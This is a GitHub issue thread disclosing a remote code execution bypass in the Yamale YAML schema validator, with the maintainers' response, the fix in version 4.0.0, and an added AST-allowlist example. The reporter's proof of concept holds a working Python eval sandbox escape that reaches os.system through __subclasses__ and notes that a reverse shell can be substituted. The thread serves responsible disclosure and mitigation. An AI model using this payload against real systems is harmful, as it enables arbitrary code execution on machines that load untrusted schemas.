23andMe / Yamale

A schema and validator for YAML.
MIT License

RCE Vulnerability in Yamale #167

Closed orenbenya1 closed 3 years ago

orenbenya1 commented 3 years ago

This is a bypass for the patch in yamale/syntax/parser.py.


we can bypass it simply by adding "str()" to our poc:

POC Example:

```python
import yamale

# This poc works for both windows and linux.
# It simply runs echo 'test' > test, you can replace the command with
# reverse shell
schema = yamale.make_schema(content="""
name: str([x.__init__.__globals__["sys"].modules["os"].system("echo 'test' > test") for x in ''.__class__.__base__.__subclasses__() if "_ModuleLock" == x.__name__])
age: int(max=200)
height: num()
awesome: bool()
""")

# Create a Data object
data = yamale.make_data(content="""
name: Bill
age: 200
height: 6.2
awesome: True
""")

# Validate data against the schema. Throws a ValueError if data is invalid.
yamale.validate(schema, data)
```

mildebrandt commented 3 years ago

Thank you for your report and reproduction. We'll take a look at this.

scriptsrc commented 3 years ago

@orenbenya1 - Do you have a BugCrowd account?

https://bugcrowd.com/twentythree-and-me

If you submit a link to this issue on that platform I believe we can send some money your way. I really appreciate your report here.

dguerri commented 3 years ago

Is this bug exploitable on 23andme.com? Are you using this internally?

mildebrandt commented 3 years ago

Hi @orenbenya1, thank you again for your report. We've mitigated your particular issue in https://github.com/23andMe/Yamale/pull/173, but we realize that fixing eval() can be a game of whack-a-mole. As such, we've also added a warning in several places in the README to indicate that users must use schemas from trusted sources.

And thank you @dguerri for your inquiry. Our use of yamale is limited to our build tools, where we control both the schema and the yaml files. We don't use yamale to process any customer data, nor is it used in the operation of 23andme.com.

This fix is available in version 4.0.0. We've incremented the major version due to some of the limitations we're now placing on the schema with the latest fix. There are no known backwards incompatibilities, but some users may have more complex schemas than we test with.
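One way to take eval() out of the picture entirely, instead of patching what it is allowed to see, is to parse each schema expression as an AST and accept nothing but an allowlisted validator call with literal arguments. The block below is an added example written for this page; it is not Yamale's code or the fix in PR #173, and the `_validator` stand-ins, `SchemaSyntaxError`, `parse_validator` and `accepts` are hypothetical names.

```python
import ast
# Stand-ins for validator constructors, modelled on the schema syntax in the
# issue (str(), int(max=200), num(), bool()); they are not Yamale's classes.
def _validator(type_name):
    def build(*args, **kwargs):
        return {"type": type_name, "args": args, "kwargs": kwargs}
    return build

ALLOWED_VALIDATORS = {n: _validator(n) for n in ("str", "int", "num", "bool")}

class SchemaSyntaxError(ValueError):
    """Raised for any expression that is not an allowlisted validator call."""

def _literal(node):
    # literal_eval accepts only constants and container literals; attribute
    # access, subscripts, comprehensions and nested calls raise ValueError.
    try:
        return ast.literal_eval(node)
    except (ValueError, TypeError) as exc:
        raise SchemaSyntaxError(f"argument must be a literal: {ast.dump(node)}") from exc

def parse_validator(expr):
    """Build a validator from one schema expression without eval(): only
    name(<literals>, key=<literal>) with name in ALLOWED_VALIDATORS passes."""
    try:
        tree = ast.parse(expr.strip(), mode="eval")
    except SyntaxError as exc:
        raise SchemaSyntaxError(f"not a valid expression: {expr!r}") from exc
    call = tree.body
    # Shape is checked on the AST before any constructor runs, so there is
    # no runtime namespace for a crafted expression to escape from.
    if not isinstance(call, ast.Call) or not isinstance(call.func, ast.Name):
        raise SchemaSyntaxError(f"expected a validator call, got {type(call).__name__}")
    if call.func.id not in ALLOWED_VALIDATORS:
        raise SchemaSyntaxError(f"unknown validator {call.func.id!r}")
    args = [_literal(a) for a in call.args]
    kwargs = {}
    for kw in call.keywords:
        if kw.arg is None:  # **mapping expansion
            raise SchemaSyntaxError("** expansion is not allowed")
        kwargs[kw.arg] = _literal(kw.value)
    return ALLOWED_VALIDATORS[call.func.id](*args, **kwargs)

def accepts(expr):
    try:
        parse_validator(expr)
    except SchemaSyntaxError:
        return False
    return True
```

The legitimate lines from the issue's schema (`int(max=200)`, `num()`, `bool()`) parse, while any expression containing attribute access, a comprehension, a subscript or a non-allowlisted name is rejected before anything is executed.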

orenbenya1 commented 3 years ago

The patch seems to fix it. @scriptsrc, I'm glad to help! I didn't know you had a bug bounty program; I submitted the issue to BugCrowd as you said. Thank you so much :)